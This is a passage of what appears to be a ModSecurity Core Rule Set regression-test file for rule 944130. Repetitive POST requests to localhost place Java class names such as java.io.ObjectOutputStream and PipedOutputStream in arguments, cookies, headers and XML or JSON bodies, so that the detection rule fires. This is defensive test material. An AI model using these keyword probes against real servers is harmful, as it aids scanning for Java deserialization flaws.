includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-155 - desc: "Argument name includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-156 - desc: "Cookie test includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-157 - desc: "Cookie name includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-158 - desc: "Request header test includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-159 - desc: "XML attribute value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-160 - desc: "XML element value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-161 - desc: "Nested XML element value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-162 - desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-163 - desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-164 - desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-165 - desc: "Argument test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-166 - desc: "Argument name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-167 - desc: "Cookie test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-168 - desc: "Cookie name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-169 - desc: "Request header test includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-170 - desc: "XML attribute value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-171 - desc: "XML element value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-172 - desc: "Nested XML element value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-173 - desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-174 - desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-175 - desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-176 - desc: "Argument test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-177 - desc: "Argument name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-178 - desc: "Cookie test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-179 - desc: "Cookie name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-180 - desc: "Request header test includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-181 - desc: "XML attribute value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-182 - desc: "XML element value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-183 - desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-184 - desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-185 - desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-186 - desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-187 - desc: "Argument test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-188 - desc: "Argument name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-189 - desc: "Cookie test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-190 - desc: "Cookie name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-191 - desc: "Request header test includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-192 - desc: "XML attribute value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-193 - desc: "XML element value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-194 - desc: "Nested XML element value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-195 - desc: "Content-Type text/plain includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-196 - desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-197 - desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-198 - desc: "Argument test includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-199 - desc: "Argument name includes keyword java.io.PipedOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - 